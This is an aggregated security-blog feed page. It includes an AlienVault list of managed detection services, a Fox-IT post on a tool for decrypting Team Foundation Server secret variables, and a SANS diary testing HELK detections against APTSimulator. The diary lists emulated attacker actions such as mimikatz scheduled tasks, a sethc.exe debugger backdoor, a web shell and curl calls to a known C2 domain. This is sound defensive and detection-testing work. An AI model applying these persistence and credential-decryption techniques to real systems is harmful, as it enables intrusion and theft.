Otro de los momentos de esta semana pasada: la keynote de apertura del Network Innovation Day 2018 #nid2018 con el mítico Guillermo Ansaldo (esta vez él sin traje de rockero) }:)A post shared by Chema Alonso (@chemaalonso) on Jun 16, 2018 at 10:24pm PDT
Foto para mi recuerdo personal. Enrique Blanco - Global CTIO de Telefonica -, David Cervigón - Cloud Solutions Architect de Microsoft - Ignacio Cirac - Premio Principe de Asturias - y David del Val - Director se Product Innovation en Telefónica -. Grandes profesionales y compañeros. Podría dedicar mucho tiempo a hablar de ellos, pero lo cierto es que a veces me siento como en un parque de atracciones pudiendo disfrutar todos los días en mi trabajo por estar cerca de personas de su altura.A post shared by Chema Alonso (@chemaalonso) on Jun 14, 2018 at 9:31pm PDT
Las sesiones son todas cortitas, ya que queríamos que el evento fuera muy dinámico, así que cada una tiene una duración de entre 5 y 20 minutos - la presentación inicial - como máximo. Esto te permitirá, si así lo deseas, ir desgranando el evento poco a poco a ratos.
Saludos Malignos!
Sigue Un informático en el lado del mal - Google+ RSS 0xWord
Categories: Security Posts

10 Opportunities for MSPs and MSSPs to Deliver MDR Services

AlienVault Blogs - Wed, 2018/06/20 - 15:00
The proliferation of cybersecurity attacks and greater adoption of cloud applications and services is proving that traditional, prevention-only approaches are ineffective. Instead, organizations are focusing more on a detection and response strategy to manage their cybersecurity risk. However, staying up to date with the latest cybersecurity risks, managing multiple point security products, and finding skilled security resources is proving too challenging for many organizations that are instead looking to invest in Managed Detection and Response (MDR) services from their service providers, including MSPs and MSSPs. For service providers, the MDR trend creates an opportunity to stay competitive and add value that helps clients defend and respond to cyber threats. Here are 10 opportunities to embrace and deliver competitive MDR services:
  1. Provide 24-hour monitoring: Most organizations today are online and continuously connected, but many do not have the resources to monitor their IT security across all hours of every day. Offering round-the-clock monitoring takes the burden off resource constrained organizations, and helps reduce their cybersecurity risk both during and outside of regular business hours.
  2. Monitor cloud environments and applications: Many organizations are considering, or have already begun, the drive towards deploying infrastructure in the cloud or even using cloud applications for workloads like e-mail, collaboration, CRM, payroll, identity, and more. However, traditional security tools and existing expertise lack the capability and know-how of monitoring these environments, creating an increasing opportunity for service providers to help organizations on their respective journeys to the cloud.
  3. Identify the attack surface with asset discovery: The assets deployed across an organization’s environment represents the surface against which a malicious entity will conduct one or more attacks. That in mind, a common challenge for IT and security teams—both in terms of managing cost and cybersecurity risk—is keeping track of what assets are deployed and where. Particularly with the ease and speed in which new virtual machines can be created on virtualized and cloud environments, keeping track of any changes is critical. Service providers can solve this problem for clients by including asset discovery in their MDR services, providing awareness and visibility into all assets on-premises and in the cloud.
  4. Perform vulnerability scanning: Finding and addressing vulnerabilities is critical because they are often exploited to deliver zero-day threats and ransomware, and it’s no surprise to see regular vulnerability scanning a requirement for compliance with many regulations. Once you know where all assets are in the environment, the next logical step is to assess them for vulnerabilities which, given that an average of 14 vulnerabilities are discovered each month, needs to be performed regularly. While some customers may wish to patch systems on their own, service providers can also offer vulnerability remediation, namely the application of available patches, as an additional service. 
  5. Provide log management: Identifying risks and attacks requires analyzing events and logs, and being able to determine the root cause of an attack typically requires piecing together events from across multiple systems. The manual approach of collecting logs from individual systems is resource intensive, and that’s assuming the device still has the logs for the desired timeframe. Service providers can offer a better way with log management, automating the collection of events and logs into a central location, normalizing the log data for easier analysis and investigation, and storage of the data for at least one year to help customers satisfy any regulatory or standards-based log retention requirements (e.g. for PCI DSS), and for security best practice. 
  6. Offer advanced intrusion detection and security analysis: These will facilitate the rapid detection of threats across customers’ on-premises and cloud environments and applications. Host IDS and file integrity monitoring (FIM), network IDS, and cloud IDS can all offer quick warning of attacks and unauthorized activities. Additionally, advanced correlation—including the use of machine learning and behavioral monitoring—can accurately identify threats that may not be clearly apparent to traditional defenses
  7. Provide threat intelligence and context: To get the latest cyber threat indicators and context, some organizations opt to do their own research and analyze threat intelligence on their own, and some choose to acquire threat intelligence from a 3rd party. Both of these approaches often prove too expensive for many organizations, both in up-front cost and time, and especially considering that some have to procure multiple commercial threat intelligence feeds to meet their needs. Service providers who offer threat intelligence as part of their portfolio will have a distinct advantage, being able to be proactive against new threats, and have the right context on threats so that they can deliver optimal protection, response, and quickly show their customers that they are knowledgeable of the who, what, why and when questions that surround cyber threats.
  8. Deliver incident validation and response: Once an incident has been detected, the first step is to validate whether it is an actual threat or just noise, which often requires advanced knowledge and experience. The next step is delivering relevant information about each threat—what it is, its strategy and method, its origin and target, the threat actor, and the recommended response. While some organizations may wish to respond on their own, there is an accelerating trend for service providers to contain and/or fully remediate incidents, as well as perform post-incident forensics to identify the root cause.
  9. Deliver backup and recovery capabilities: The simplest form of business continuity, but one that is often poorly implemented across many organizations, is backup and recovery. This provides opportunity for service providers to deliver verified backup, along with the option to fully or partially recover systems and data, in the event of an outage or loss such as from a ransomware attack. Service providers can choose to offer additional business continuity services, such as the provision of warm and hot sites, as additional differentiators.
  10. Provide security consultation: Organizations often invest in disparate protection tools that don’t always work together, that require expertise they lack, or that may not be adequate for the environments they are trying to protect. This is exacerbated by the lack of skilled talent on the market, and new challenges such as protecting cloud and mobile assets. Service providers can address this space by offering consulting services to guide customers on understanding their environment, identify where there are risks, and helping develop and implement a cybersecurity management plan. In addition, service providers can offer training services, such as how customers can recognize phishing attacks, and how to respond if they discover them.
To accelerate your managed security services with AlienVault Unified Security Management, visit www.alienvault.com/partners. 
Categories: Security Posts

Microcode in pictures

Hex blog - Fri, 2018/06/15 - 23:07
Since a picture is worth thousand words below are a few drawings for your perusal. Let us start at the top level, with the mbl_array_t class, which represents the entire microcode object: The above picture does not show the control flow graph. For that we use predecessor and successor lists: Pay attention to the block … Continue reading Microcode in pictures
Categories: Security Posts

Introducing Team Foundation Server decryption tool

Fox-IT - Thu, 2018/05/17 - 13:06
During penetration tests we sometimes encounter servers running software that use sensitive information as part of the underlying process, such as Microsoft’s Team Foundation Server (TFS). TFS can be used for developing code, version control and automatic deployment to target systems. This blogpost provides two tools to decrypt sensitive information that is stored in the TFS database. Decrypting TFS secrets Within Team Foundation Server (TFS), it is possible to automate the build, testing and deployment of new releases. With the use of variables it is possible to create a generic deployment process once and customize it per environment.1 Sometimes specific tasks need a set of credentials or other sensitive information and therefor TFS supports encrypted variables. With an encrypted variable the contents of the variables is encrypted in the database and not visible for the user of TFS. However, with the correct amount of access rights to the database it is possible to decrypt the encrypted content. Sebastian Solnica wrote a blogpost about this, which can be read on the following link: https://lowleveldesign.org/2017/07/04/decrypting-tfs-secret-variables/ Fox-IT wrote a PowerShell script that uses the information mentioned in the blogpost. While the blogpost mainly focused on the decryption technique, the PowerShell script is built with usability in mind. The script will query all needed values and display the decrypted values. An example can be seen in the following screenshot: The script can be downloaded from Fox-IT’s Github repository: https://github.com/fox-it/Decrypt-TFSSecretVariables It is also possible to use the script in Metasploit. Fox-IT wrote a post module that can be used through a meterpreter session. The result of the script can be seen in the screenshot below. There is a pull request pending and hopefully the module will be part of the Metasploit Framework soon. The pull request can be found here: https://github.com/rapid7/metasploit-framework/pull/9930 References [1] https://docs.microsoft.com/en-us/vsts/build-release/concepts/definitions/release/variables?view=vsts&tabs=batch
[2] https://lowleveldesign.org/2017/07/04/decrypting-tfs-secret-variables
Categories: Security Posts

Fabricating a Trellis

Niels Provos - Fri, 2018/05/04 - 06:10

The garden needed some trellises for roses. We came up with a circle design and are fabricating it in the shop. Mild steel bar is bent into many different ring sizes and then put together into a fairly large trellis. I am also showing some really beautiful slow motion shots of welding and grinding in high dynamic range.
Categories: Security Posts

An Elaborate Hack Shows How Much Damage IoT Bugs Can Do

Wired: Security - Mon, 2018/04/16 - 19:00
Rube-Goldbergesque IoT hacks are surprisingly simple to pull off—and can do a ton of damage.
Categories: Security Posts

How Russian Facebook Ads Divided and Targeted US Voters Before the 2016 Election

Wired: Security - Mon, 2018/04/16 - 15:00
New research shows just how prevalent political advertising was from suspicious groups in 2016—including Russian trolls.
Categories: Security Posts

Infocon: green

SANS Internet Storm Center, InfoCON: green - Fri, 2018/04/06 - 17:46
ISC Stormcast For Friday, April 6th 2018 https://isc.sans.edu/podcastdetail.html?id=5943
Categories: Security Posts

ISC Stormcast For Friday, April 6th 2018 https://isc.sans.edu/podcastdetail.html&#x3f;id=5943, (Fri, Apr 6th)

SANS Internet Storm Center, InfoCON: green - Fri, 2018/04/06 - 03:30
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security Posts

&#x26;#xa;Threat Hunting &#x26; Adversary Emulation: The HELK vs APTSimulator - Part 1, (Thu, Apr 5th)

SANS Internet Storm Center, InfoCON: green - Thu, 2018/04/05 - 19:26

Ladies and gentlemen, for our main attraction, I give you...The HELK vs APTSimulator, in a Death Battle! The late, great Randy "Macho Man" Savage said many things in his day, in his own special way, but "Expect the unexpected in the kingdom of madness!" could be our theme. I'm having a flashback to my college days, many moons ago. :-) The HELK just brought it on. Yes, I know, HELK is the Hunting ELK stack, got it, but it reminded me of the Hulk, and then, I thought of a Hulkamania showdown with APTSimulator, and Randy Savage's classic, raspy voice popped in my head with "Hulkamania is like a single grain of sand in the Sahara desert that is Macho Madness." And that, dear reader, is a glimpse into exactly three seconds or less in the mind of your scribe, a strange place to be certain. But alas, that's how we came up with this fabulous showcase.
In this corner, from Roberto Rodriguez, @Cyb3rWard0g, the specter in SpecterOps, it's...The...HELK! This, my friends, worth every ounce of hype we can muster.
And in the other corner, from Florian Roth, @cyb3rops, the The Fracas of Frankfurt, we have APTSimulator. All your worst adversary apparitions in one APT mic drop. This...is...Death Battle! Now with that out of our system, let's begin. There's a lot of goodness here, so I'm definitely going to do this in two parts so as not undervalue these two offerings.
HELK is incredibly easy to install. Its also well documented, with lots of related reading material, let me propose that you take the tine to to review it all. Pay particular attention to the wiki, gain comfort with the architecture, then review installation steps.
On an Ubuntu 16.04 LTS system I ran:
git clone https://github.com/Cyb3rWard0g/HELK.git
cd HELK/
sudo ./helk_install.sh 
Of the three installation options I was presented with, pulling the latest HELK Docker Image from cyb3rward0g dockerhub, building the HELK image from a local Dockerfile, or installing the HELK from a local bash script, I chose the first and went with the latest Docker image. The installation script does a fantastic job of fulfilling dependencies for you, if you haven't installed Docker, the HELK install script does it for you. You can observe the entire install process in Figure 1. Figure 1: HELK Installation
You can immediately confirm your clean installation by navigating to your HELK KIBANA URL, in my case http://192.168.248.29.
For my test Windows system I created a Windows 7 x86 virtual machine with Virtualbox. The key to success here is ensuring that you install Winlogbeat on the Windows systems from which you'd like to ship logs to HELK. More important, is ensuring that you run Winlogbeat with the right winlogbeat.yml file. You'll want to modify and copy this to your target systems. The critical modification is line 123, under Kafka output, where you need to add the IP address for your HELK server in three spots. My modification appeared as hosts: ["192.168.248.29:9092","192.168.248.29:9093","192.168.248.29:9094"]. As noted in the HELK architecture diagram, HELK consumes Winlogbeat event logs via Kafka.
On your Windows systems, with a properly modified winlogbeat.yml, you'll run:
./winlogbeat -c winlogbeat.yml -e
./winlogbeat setup -e
You'll definitely want to set up Sysmon on your target hosts as well. I prefer to do so with the @SwiftOnSecurity configuration file. If you're doing so with your initial setup, use sysmon.exe -accepteula -i sysmonconfig-export.xml. If you're modifying an existing configuration, use sysmon.exe -c sysmonconfig-export.xml.  This will ensure rich data returns from Sysmon, when using adversary emulation services from APTsimulator, as we will, or experiencing the real deal.
With all set up and working you should see results in your Kibana dashboard as seen in Figure 2.
Figure 2: Initial HELK Kibana Sysmon dashboard.
Now for the showdown. :-) Florian's APTSimulator does some comprehensive emulation to make your systems appear compromised under the following scenarios:
  • POCs: Endpoint detection agents / compromise assessment tools
  • Test your security monitoring's detection capabilities
  • Test your SOCs response on a threat that isn't EICAR or a port scan
  • Prepare an environment for digital forensics classes 
This is a truly admirable effort, one I advocate for most heartily as a blue team leader. With particular attention to testing your security monitoring's detection capabilities, if you don't do so regularly and comprehensively, you are, quite simply, incomplete in your practice. If you haven't tested and validated, don't consider it detection, it's just a rule with a prayer. APTSimulator can be observed conducting the likes of:
  • Creating typical attacker working directory C:\TMP...
  • Activating guest user account
    • Adding the guest user to the local administrators group
  • Placing a svchost.exe (which is actually srvany.exe) into C:\Users\Public
  • Modifying the hosts file
    • Adding update.microsoft.com mapping to private IP address
  • Using curl to access well-known C2 addresses
    • C2: msupdater.com
  • Dropping a Powershell netcat alternative into the APT dir
  • Executes nbtscan on the local network
  • Dropping a modified PsExec into the APT dir
  • Registering mimikatz in At job
  • Registering a malicious RUN key
  • Registering mimikatz in scheduled task
  • Registering cmd.exe as debugger for sethc.exe
  • Dropping web shell in new WWW directory
A couple of notes here.
Download and install APTSimulator from the Releases section of its GitHub pages.
APTSimulator includes curl.exe, 7z.exe, and 7z.dll in its helpers directory. Be sure that you drop the correct version of 7 Zip for your system architecture. I'm assuming the default bits are 64bit, I was testing on a 32bit VM. Let's do a fast run-through with HELK's Kibana Discover option looking for the above mentioned APTSimulator activities. Starting with a search for TMP in the sysmon-* index yields immediate results and strikes #1, 6, 7, and 8 from our APTSimulator list above, see for yourself in Figure 3.
Figure 3: TMP, PS nc, nbtscan, and PsExec in one shot
Created TMP, dropped a PowerShell netcat, nbtscanned the local network, and dropped a modified PsExec, check, check, check, and check.
How about enabling the guest user account and adding it to the local administrator's group? Figure 4 confirms.
Figure 4: Guest enabled and escalated
Strike #2 from the list. Something tells me we'll immediately find svchost.exe in C:\Users\Public. Aye, Figure 5 makes it so.
Figure 5: I've got your svchost right here
Knock #3 off the to-do, including the process.commandline, process.name, and file.creationtime references. Up next, the At job and scheduled task creation. Indeed, see Figure 6.
Figure 6: tasks OR schtasks
I think you get the point, there weren't any misses here. There are, of course, visualization options. Don't forget about Kibana's Timelion feature. Forensicators and incident responders live and die by timelines, use it to your advantage (Figure 7).
Figure 7: Timelion
Finally, under HELK's Kibana Visualize menu, you'll note 34 visualizations. By default, these are pretty basic, but you quickly add value with sub-buckets. As an example, I selected the Sysmon_UserName visualization. Initially, it yielded a donut graph inclusive of malman (my pwned user), SYSTEM and LOCAL SERVICE. Not good enough to be particularly useful I added a sub-bucket to include process names associated with each user. The resulting graph is more detailed and tells us that of the 242 events in the last four hours associated with the malman user, 32 of those were specific to cmd.exe processes, or 18.6% (Figure 8).
Figure 8: Powerful visualization capabilities
I am thrilled with both HELK and APTSimulator. The true principles of blue team and detection quality are innate in these projects. The fact that Roberto considers HELK still in alpha state leads me to believe there is so much more to come. Be sure to dig deeply into APTSimulator's Advanced Solutions as well, there's more than one way to emulate an adversary.
Part 2 will explore HELK integration with Spark, Graphframes & Jupyter notebooks.
Russ McRee | @holisticinfosec (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security Posts

Thu, 1970/01/01 - 02:00
Syndicate content